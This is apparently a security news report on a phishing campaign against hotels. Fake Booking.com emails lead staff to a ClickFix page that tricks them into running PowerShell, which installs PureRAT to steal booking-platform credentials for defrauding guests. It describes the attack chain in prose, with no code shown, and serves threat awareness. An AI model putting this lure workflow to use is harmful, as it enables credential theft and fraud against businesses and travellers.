Cybersecurity experts have identified a large-scale phishing attack directed at the hospitality sector, focusing on hotel management. The attackers’ strategy involves sending spear-phishing emails that look like they’re from legitimate booking services, specifically impersonating Booking.com, to redirect victims to malicious websites. The social engineering technique used, known as ClickFix, is designed to trick the target into interacting with the fraudulent page, which then facilitates the deployment of malware like PureRAT. This campaign has been active since at least April 2025 and was still operational as of early October 2025.
The primary goal of the operation is to steal system credentials to gain unauthorized access to major booking platforms such as Booking.com or Expedia. Once stolen, these high-value credentials are either sold on dark web cybercrime forums or used directly by the threat actors to send fraudulent communications to hotel customers, leading to further financial fraud. This campaign is one of several similar observed attacks targeting the industry recently.
In the most recent wave analyzed by a French cybersecurity firm, the malicious emails originate from a compromised email account and are sent to numerous hotels across different countries. The emails manipulate recipients into clicking on bogus links, which initiates a redirection sequence. This chain leads to a fake ClickFix page that displays a supposed reCAPTCHA challenge to “ensure the security of your connection.” The website then redirects users to a page hosting a JavaScript function.
Upon loading, this JavaScript performs a check to see if the page is being displayed within an iframe. If it’s not, the script redirects the user to the same URL, but forces the connection over HTTP instead of HTTPS. This security compromise allows the victim to be presented with and manipulated into executing a malicious PowerShell command. This command first gathers information about the compromised system and then downloads a ZIP archive. Inside the archive is a binary file that ultimately achieves persistence on the system and loads the PureRAT malware (also known as zgRAT) through a technique called DLL side-loading.
PureRAT is a highly modular malware equipped with extensive capabilities, including features for remote access, control over the victim’s mouse and keyboard, capturing data from webcams and microphones, keylogging, file transfer, network traffic proxying, data exfiltration, and the remote execution of commands or binaries. To complicate analysis by security researchers, the malware is protected by .NET Reactor. Furthermore, once the attackers have access, they use the stolen reservation data to contact hotel customers via WhatsApp or email, instructing them to click a link for a supposed verification process to confirm their banking card details and prevent their booking from being canceled, extending the fraud chain.
Reference:
